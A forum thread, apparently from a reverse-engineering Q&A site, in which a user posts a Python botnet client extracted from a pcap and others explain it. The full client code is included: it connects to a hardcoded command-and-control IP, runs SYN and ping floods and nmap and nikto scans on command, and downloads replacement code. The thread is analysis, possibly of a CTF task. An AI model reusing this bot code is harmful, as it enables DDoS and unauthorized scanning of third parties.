# I got a python script decrypted out of a pcap from a botnet

Tags: botnet, python

I got a python script decrypted out of a pcap file it's communication from a botnet (proberbly the c&c) but when i start the script i ain't getting login or passwords.

What does this script do?
And how can i find the client controller?

```
from twisted.internet import reactor
from twisted.internet.protocol import ReconnectingClientFactory
from twisted.protocols.basic import LineReceiver
import os
import re
import random
import sys
import subprocess
from base64 import b64encode, b64decode

class ZeroNetClientProtocol(LineReceiver):
    delimiter = "\n"

    def __init__(self, pass1, pass2):
        self.pass1 = pass1
        self.pass2 = pass2
        self.version = 1.101
        self.state = "INIT"
        self.commands = {
            "DOWNLOAD": {
                "request_args": 1,
                "request_handler": None,
                "response_args": 2,
                "response_handler": self.handleDownloadResponse,
            },
            "NIKTO": {
                "request_args": 2,
                "request_handler": self.handleAttackRequest,
                "response_args": 2,
                "response_handler": None
            },
            "NMAP": {
                "request_args": 2,
                "request_handler": self.handleAttackRequest,
                "response_args": 2,
                "response_handler": None
            },
            "PING": {
                "request_args": 1,
                "request_handler": self.handlePingRequest,
                "response_args": 1,
                "response_handler": None
            },
            "PINGFLOOD": {
                "request_args": 3,
                "request_handler": self.handleAttackRequest,
                "response_args": 2,
                "response_handler": None
           },
           "SYNFLOOD": {
                "request_args": 3,
                "request_handler": self.handleAttackRequest,
                "response_args": 2,
                "response_handler": None
            },
            "VERSION": {
                "request_args": 0,
                "request_handler": None,
                "response_args": 1,
                "response_handler": self.handleVersionResponse,
            },
        }
        pass

    def connectionMade(self):
        self.sendLine(self.pass1)
        self.sendLine(self.pass2)

    def lineReceived(self, line):
        print line
        words = line.split()

        if self.state == "INIT" and line == "OK":
            print line
            self.sendLine("VERSION?")
            self.state = "COMMAND"
            return
        elif self.state == "INIT":
            return

        if len(words) <= 0:
            print ("Unknown command")
            return

        matches = re.search(r"^(.+)([?!])$", words[0])
        if not matches:
             print ("Unknown command")
             return

        command = matches.group(1)
        if matches.group(2) == '?':
            command_type = 'REQUEST'
        else:
            command_type = 'RESPONSE'

        if not self.commands.has_key(command):
            print ("Unknown command")
            return

        if command_type == 'REQUEST':
            request_args = self.commands[command]['request_args']
            request_handler = self.commands[command]['request_handler']
            if len(words) - 1 != request_args:
                print ("Unknown command")
                return

            if request_handler:
                request_handler(command, *words[1:])
        else:
            response_args = self.commands[command]['response_args']
            response_handler = self.commands[command]['response_handler']
            if len(words) - 1 != response_args:
                print ("Unknown command")
                return

            if response_handler:
                response_handler(command, *words[1:])

        print command, command_type

    def attack(self, ident, command, arg1, arg2, attack):
        result = subprocess.check_output([command, arg1, str(arg2)])
        self.sendLine("{0}! {1} {2}".format(attack, ident, b64encode(result)))

    def handleAttackRequest(self, command, ident, ip, duration=0):
        if not re.match("^[0-9]+$", ident) or not re.match("^[0-9.]+$", ip) or \
            (duration and not re.match("^[0-9]+$", duration)):
            print ("Unknown command")
            return

        if command == "NIKTO":
            reactor.callInThread(self.attack, ident, "./nikto.sh", ip, 0, command)
        elif command == "NMAP":
            reactor.callInThread(self.attack, ident, "./nmap.sh", ip, 0, command)
        elif command == "SYNFLOOD":
            reactor.callInThread(self.attack, ident, "./synflood.sh", ip, duration,    
            command)
        elif command == "PINGFLOOD":
            reactor.callInThread(self.attack, ident, "./pingflood.sh", ip, duration,    
            command)
        else:
            print ("Unknown command")
            return

    def handleDownloadResponse(self, command, version, data):
        f = open("client.py", "w")
        f.write(b64decode(data))
        f.close()
        reactor.stop()

    def handlePingRequest(self, command, ident):
        self.sendLine("PING! {0}".format(ident))

    def handleVersionResponse(self, command, version):
        if float(version) > self.version:
            self.sendLine("DOWNLOAD? {0}".format(str(float(version))))

class ZeroNetClientProtocolFactory(ReconnectingClientFactory):
    def __init__(self, pass1, pass2):
        self.pass1 = pass1
        self.pass2 = pass2

    def buildProtocol(self, addr):
        return ZeroNetClientProtocol(self.pass1, self.pass2)

import sys

if len(sys.argv) != 3:
    print "Usage: client.py <primary password> <secondary password>"
    sys.exit(1)

pass1 = sys.argv[1]
pass2 = sys.argv[2]

reactor.connectTCP("82.94.242.254", 8123, ZeroNetClientProtocolFactory(pass1, pass2))
reactor.run()
```

Comment: This was posted a few times in the last few days, is it for some CTF? Anyway, there's no passwords in this code, you're supposed to provide them as input parameters when you call the script, see the error displayed if you don't call it with 3 parameters (one being the script itself, followed by two passwords, separated by space): `Usage: client.py <primary password> <secondary password>`

Answer (score 2):

The python script connects to the IP `82.94.242.254` on port `8123`, authenticates using pass1 and pass2 and then start receiving commands from the C&C.
The commands are `DOWNLOAD`, `NIKTO`, `NMAP`, `PING`, `PINGFLOOD`, `SYNFLOOD` and `VERSION`.
Most of these will trigger the execution of a .sh script.

From the names we can guess the kind of commands available, which are mainly DDoS attacks (PING and SYN flood), reconnaissance using nmap (network discovery) and nikto (web vulnerability scanner) and other for maintaining the bot (downloading and version number).

Comment: oke just what i allready thought, but is 82.94.242.254 the client controller, did i got that wright?
And how can you get the passes for my computer, and how to enter them?

Comment: How can i obtain pass1 and pass2, i can't get them..?

Comment: The IP address is probably the address of the server  C&C. To get pass1 and pass2, you must have access to the bot, you can either intercept the traffic or try reversing it to extract them.

Comment: ok
thats the problem i don't have acces to the bot.
i all ready sniffed the traffic but it doesn't give me any clue on where the bot is or how to contact it..
How and what should i do no get that??

I got the pcap from wich i extracted everything here, but can't seem to get the exact location, adress or link to the bot..

Comment: the ip wich connects to the c&c is 203.0.113.56
when i do a GeoIP it doesn't give a location and the isp is test net, so therefore i believe to think that the bot is behind this ip...
but how can i trace it further back..

Comment: Help someone?? with getting the bot out of this pcap???